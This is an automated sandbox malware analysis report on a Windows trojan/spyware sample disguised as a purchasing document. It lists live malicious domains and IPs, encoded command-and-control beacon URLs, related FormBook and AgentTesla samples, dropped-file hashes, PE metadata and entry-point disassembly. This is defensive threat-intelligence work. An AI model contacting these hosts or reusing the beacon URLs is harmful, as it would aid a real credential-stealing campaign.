            www.deadshoy.tech | 199.59.243.227 | true | true | | unknown
            www.telepzow.fit | 104.21.64.208 | true | true | | unknown
            thesnusgang.fun | 84.32.84.32 | true | true | | unknown
            www.cruycq.info | 47.83.1.90 | true | true | | unknown
            www.thesnusgang.fun | unknown | unknown | false | | unknown
            www.dnft.immo | unknown | unknown | false | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://www.thesnusgang.fun/z4qr/?QT=1ZZgvIaiKHhduep+YaBDSgnAwH9SiWnEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jtTWbac3F9TEassXJax+dUsBKSmbq0EscsQY=&LLp=-2JPqdjXxxH4 | true | Avira URL Cloud: safe | unknown
            http://www.telepzow.fit/oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA= | true | Avira URL Cloud: phishing | unknown
            http://www.telepzow.fit/oizn/ | true | Avira URL Cloud: phishing | unknown
            http://www.y6h6kn.top/jv64/?QT=0rgj4Y9sgnjazUN8mpbMdGhoFe+HkDbNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7y+Y5ieOqpPsPHRlC6dNFB2EQ+kIpm+R3QUE=&LLp=-2JPqdjXxxH4 | true | Avira URL Cloud: safe | unknown
            http://www.dnft.immo/yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH4 | true | Avira URL Cloud: safe | unknown
            http://www.thesnusgang.fun/z4qr/ | true | Avira URL Cloud: safe | unknown
            http://www.deadshoy.tech/0sq9/?LLp=-2JPqdjXxxH4&QT=wDssjmzaov4c9lpHi4/A+j8N6f+vZebPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdxGSDI/O/AvGAu226L0N94rOkpbvikda6PNY= | true | Avira URL Cloud: safe | unknown
            http://www.deadshoy.tech/0sq9/ | true | Avira URL Cloud: safe | unknown
            http://www.freshteps.life/qp01/ | true | Avira URL Cloud: safe | unknown
            http://www.dnft.immo/yeky/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | xwizard.exe, 00000004.00000002.65195625577.0000000005FEC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65196526701.0000000007D20000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65195625577.0000000005E5A000.00000004.10000000.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65195057991.0000000003EEC000.00000004.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65195057991.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | false | | high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search | xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | false | | high
https://duckduckgo.com/ac/?q= | X0a-0531.4.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | false | | high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.dr | false | | high
http://www.freshteps.life | EIyKLgVzlk.exe, 00000005.00000002.65193414239.0000000001588000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | X0a-0531.4.dr | false | | high
https://www.ecosia.org/newtab/ | xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://gemini.google.com/app?q= | xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.79.41 | www.freshteps.life | United States | 31744 | MULTIBAND-NEWHOPEUS | true
104.21.64.208 | www.telepzow.fit | United States | 13335 | CLOUDFLARENETUS | true
199.59.243.227 | 94950.bodis.com | United States | 395082 | BODIS-NJUS | false
84.32.84.32 | thesnusgang.fun | Lithuania | 33922 | NTT-LT-ASLT | true
162.251.95.62 | www.y6h6kn.top | United States | 26484 | IKGUL-26484US | true
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1572660
                                                        Start date and time:2024-12-10 18:45:37 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 4s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name:Potential for more IOCs and behavior
Number of new started processes analysed:5
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/5@8/5
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
Time | Type | Description
12:48:48 | API Interceptor | 3953933x Sleep call for process: xwizard.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.64.208 | 063837646WAYBILLMAR24.exe | Get hash | malicious | RedLine | Browse | artemis-rat.comartemis-rat.com:443
104.21.64.208 | SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exe | Get hash | malicious | Unknown | Browse | artemis-rat.comartemis-rat.com:443
104.21.64.208 | DHL- Shipping invoice.exe | Get hash | malicious | AgentTesla | Browse | artemis-rat.comartemis-rat.com:443
104.21.64.208 | DHL EXPRESS.exe | Get hash | malicious | AgentTesla | Browse | artemis-rat.comartemis-rat.com:443
104.21.64.208 | Kazeem Engineering and Technical Services.exe | Get hash | malicious | AgentTesla | Browse | heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
104.21.64.208 | POs#U034fx#U034fl#U034fx#U034f..exe | Get hash | malicious | AgentTesla | Browse | heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
104.21.64.208 | PO-065-01-2024E-2.exe | Get hash | malicious | AgentTesla | Browse | heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
104.21.64.208 | New Orders#U034fx#U034fl#U034fx#U034f..exe | Get hash | malicious | AgentTesla | Browse | artemis-rat.comartemis-rat.com:443
104.21.64.208 | Payment Invoice.exe | Get hash | malicious | AgentTesla | Browse | artemis-rat.comartemis-rat.com:443
104.21.64.208 | RFQ__ PO-7647454645_PDF.exe | Get hash | malicious | AgentTesla | Browse | artemis-rat.comartemis-rat.com:443
199.59.243.227 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse | ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
199.59.243.227 | Need Price Order No.17084 PARLOK.exe | Get hash | malicious | FormBook | Browse | www.solar-quotes.click/ubu8/
199.59.243.227 | DHL_734825510.exe | Get hash | malicious | FormBook | Browse | www.whisperart.net/27s6/
199.59.243.227 | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse | www.sfantulandrei.info/wvsm/
199.59.243.227 | lgkWBwqY15.exe | Get hash | malicious | FormBook | Browse | www.bcg.services/5onp/
199.59.243.227 | New quotation request.exe | Get hash | malicious | FormBook | Browse | www.bcg.services/5onp/
199.59.243.227 | SRT68.exe | Get hash | malicious | FormBook | Browse | www.acond-22-mvr.click/9qaj/
199.59.243.227 | ek8LkB2Cgo.exe | Get hash | malicious | FormBook | Browse | www.dating-ml-es.xyz/pvrm/
199.59.243.227 | bestimylover.hta | Get hash | malicious | Cobalt Strike, FormBook, HTMLPhisher | Browse | www.sql.dance/9p84/
199.59.243.227 | SW_5724.exe | Get hash | malicious | FormBook | Browse | www.whisperart.net/27s6/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
94950.bodis.com | SHIPPING DOC.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | Purchase order MIPO2425110032.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | PI916810.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | SALES ORDER875.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | Invoice & Packing list For Sea Shipment.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | Invoice Packing list For Sea Shipment.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | Invoice Packing list For Sea Shipment.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | OVERDUE BALANCE.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | PO23100072.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
94950.bodis.com | PO-000001488.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
www.cifasnc.info | bestimylover.hta | Get hash | malicious | Cobalt Strike, FormBook, HTMLPhisher | Browse | 172.67.128.109
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | l92fYljXWF.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 172.64.41.3
CLOUDFLARENETUS | qxjDerXRGR.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 172.64.41.3
CLOUDFLARENETUS | taCCGTk8n1.lnk | Get hash | malicious | RHADAMANTHYS | Browse | 172.64.41.3
CLOUDFLARENETUS | Richiesta di Indagine sulla Violazione del Copyright lnk.lnk | Get hash | malicious | Unknown | Browse | 172.64.41.3
CLOUDFLARENETUS | CMK7DB5YtR.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.64.1
CLOUDFLARENETUS | XrQ8NgQHTn.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.64.1
CLOUDFLARENETUS | https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com | Get hash | malicious | Captcha Phish | Browse | 172.67.145.201
CLOUDFLARENETUS | 9coWg6ayLz.msi | Get hash | malicious | Unknown | Browse | 162.159.140.238
CLOUDFLARENETUS | Request for quote.doc | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.6
CLOUDFLARENETUS | UFS0yWUTWR.msi | Get hash | malicious | Unknown | Browse | 172.66.0.236
BODIS-NJUS | PURCHASE REQUIRED DETAILS 000487958790903403.exe | Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse | 199.59.243.227
BODIS-NJUS | Need Price Order No.17084 PARLOK.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
BODIS-NJUS | http://doctifyblog.com | Get hash | malicious | Unknown | Browse | 199.59.243.227
BODIS-NJUS | DHL_734825510.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
BODIS-NJUS | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
BODIS-NJUS | lgkWBwqY15.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
BODIS-NJUS | New quotation request.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
BODIS-NJUS | SRT68.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
BODIS-NJUS | file.exe | Get hash | malicious | Unknown | Browse | 199.59.243.227
BODIS-NJUS | ek8LkB2Cgo.exe | Get hash | malicious | FormBook | Browse | 199.59.243.227
MULTIBAND-NEWHOPEUS | PO2412010.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | Recibos.exe | Get hash | malicious | FormBook | Browse | 209.74.77.108
MULTIBAND-NEWHOPEUS | SN500, SN150 Spec.exe | Get hash | malicious | FormBook | Browse | 209.74.64.190
MULTIBAND-NEWHOPEUS | DHL_734825510.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | SRT68.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | UPDATED CONTRACT.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | Invoice 10493.exe | Get hash | malicious | FormBook | Browse | 209.74.77.109
MULTIBAND-NEWHOPEUS | PO 4110007694.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | Document_084462.scr.exe | Get hash | malicious | FormBook, GuLoader | Browse | 209.74.77.109
                                                        No context
                                                        No context
                                                        Process:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):143378
                                                        Entropy (8bit):2.991133003759073
                                                        Encrypted:false
                                                        SSDEEP:96:AIXLr4A+F05BBCioFtN0Fl1PVA66x/bGcup9IDymun3zrWVjj7qnBaAJZdjurebD:H3bjB1sjGcup9IDymun3zrWVzqnBaA
                                                        MD5:8D3BCE34E93128FA7F65E8175E25FD58
                                                        SHA1:B9C7BFCC05F34AD35F319503BE2C295E06FDADA4
                                                        SHA-256:091D82FCEC8F54192EBB0D779B90A7F0AA3260D1DE911AD1FFDA3005E09DABBD
                                                        SHA-512:6012DF1A0967EB072DEB53D404F9B24707720032A7D727F4D4D3DFAAD489A1AB16637EC277E5EA2D88E00F66023F0337D62F7F04515DC6E9E80595EFE8F15930
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Windows\SysWOW64\xwizard.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):135168
                                                        Entropy (8bit):1.1142956103012707
                                                        Encrypted:false
                                                        SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                        MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                        SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                        SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                        SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Process:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):287232
                                                        Entropy (8bit):7.993678740554399
                                                        Encrypted:true
                                                        SSDEEP:6144:cVwUF/atyLwPFJZhBJwSFEBEvDIVyIdzKSpo:cSUhatGQJbBJ7FAq2o
                                                        MD5:BC10D4F3CB92A85B30D8B876E4B31C2C
                                                        SHA1:477E45AE6337031DFAC5824B0132716D82278126
                                                        SHA-256:06E58610539EF7FE7677D513754AEA0E3830E67D9CC570681100E044FDCB0197
                                                        SHA-512:F85D84A6231C18F783277975BB5E5C6C0A0A24F6085534853E688D9D2F9E42183DBD34350801304D0CD6C1CF6F70A9A1F70EC40751A1A2F75FA52689917D6F3E
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):14520
                                                        Entropy (8bit):7.628362779458312
                                                        Encrypted:false
                                                        SSDEEP:384:ITYznwnjovkuyDTqCo1JTglf78Uqf7NanfqjW6k1i6I:IAwnjoVEmCS8lO0nfqaj+
                                                        MD5:FEC65DD272E731DE4D2AE56ED9FED299
                                                        SHA1:5D056F9A109100BB6AEB348B9F88E347E874C8B6
                                                        SHA-256:D87FAFF8F95EA71B0FBBA29AF5196D4EFB50F2BDF338AAF8E47B858CAFA1C864
                                                        SHA-512:66F86486952500CDD4342BC7282E7B8D44DB121682EA381E290576FBA068D49F7590B3F8020357206454A161B8B35B97CDC34389F229DA21BEC84F477704DE63
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):287232
                                                        Entropy (8bit):7.993678740554399
                                                        Encrypted:true
                                                        SSDEEP:6144:cVwUF/atyLwPFJZhBJwSFEBEvDIVyIdzKSpo:cSUhatGQJbBJ7FAq2o
                                                        MD5:BC10D4F3CB92A85B30D8B876E4B31C2C
                                                        SHA1:477E45AE6337031DFAC5824B0132716D82278126
                                                        SHA-256:06E58610539EF7FE7677D513754AEA0E3830E67D9CC570681100E044FDCB0197
                                                        SHA-512:F85D84A6231C18F783277975BB5E5C6C0A0A24F6085534853E688D9D2F9E42183DBD34350801304D0CD6C1CF6F70A9A1F70EC40751A1A2F75FA52689917D6F3E
                                                        Malicious:false
                                                        Preview:.j.1AK4WHO2S..11.K4WLO2S.011BK4WLO2SN011BK4WLO2SN011BK4WLO2S.011LT.YL.;.o.0}.j`?%<.#<_VC#&.4-!\<:.STb9A9l&\s..b./$P2bB?Yj011BK4W5N;.sPV..+S.q/U.T...x+S.V.rPV.X.p/U..YRY.+S.LO2SN011..4W.N3S..aoBK4WLO2S.030IJ?WL.6SN011BK4W.[2SN 11B+0WLOrSN 11BI4WJO2SN011DK4WLO2SNP51BI4WLO2SL0q.BK$WL_2SN0!1B[4WLO2S^011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2S`DTI6K4W..6SN 11B.0WL_2SN011BK4WLO2Sn01QBK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011BK4WLO2SN011
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.160394758602908
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        File size:1'179'648 bytes
                                                        MD5:464587c795efba3d6a77d78ab9f3de32
                                                        SHA1:f2ce67c18f57c7919d951b640c30298bab731141
                                                        SHA256:60f63f5446e6a149513c50ac17e7165bb6c52006eac6acd825a142d55a2ae14f
                                                        SHA512:900a86bc12c444107c1554becf8b5c1a4eb847f47b8a0ca7785e64a5da3e0263d7a84da8e410932c176d3c7faea3e8d3f521e69dbd6b06373e0cc6ad0ae9f958
                                                        SSDEEP:24576:Ju6J33O0c+JY5UZ+XC0kGso6FaucbXiBePm/YMXNnqYgbvqSWY:ru0c++OCvkGs9FaucbXKtXFqxbvWY
                                                        TLSH:3345CF22B3DDC360CB669133FF69B7016EBF7C614630B85B2F980D79A950162162D7A3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                        Icon Hash:aaf3e3e3938382a0
                                                        Entrypoint:0x427dcd
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x67584B43 [Tue Dec 10 14:08:03 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                        Instruction
                                                        call 00007F9C646B421Ah
                                                        jmp 00007F9C646A6FE4h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007F9C646A716Ah
                                                        cmp edi, eax
                                                        jc 00007F9C646A74CEh
                                                        bt dword ptr [004C31FCh], 01h
                                                        jnc 00007F9C646A7169h
                                                        rep movsb
                                                        jmp 00007F9C646A747Ch
                                                        cmp ecx, 00000080h
                                                        jc 00007F9C646A7334h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007F9C646A7170h
                                                        bt dword ptr [004BE324h], 01h
                                                        jc 00007F9C646A7640h
                                                        bt dword ptr [004C31FCh], 00000000h
                                                        jnc 00007F9C646A730Dh
                                                        test edi, 00000003h
                                                        jne 00007F9C646A731Eh
                                                        test esi, 00000003h
                                                        jne 00007F9C646A72FDh
                                                        bt edi, 02h
                                                        jnc 00007F9C646A716Fh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007F9C646A7173h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007F9C646A71C5h
                                                        bt esi, 03h
                                                        jnc 00007F9C646A7218h
                                                        Programming Language:
                                                        • [ASM] VS2013 build 21005
                                                        • [ C ] VS2013 build 21005
                                                        • [C++] VS2013 build 21005
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2013 UPD4 build 31101
                                                        • [RES] VS2013 build 21005
                                                        • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x57628 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11f000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x57628 | 0x57800 | e66ff435eb85879b8b815efd98b64105 | False | 0.9240680803571428 | data | 7.888148655944783 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11f000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
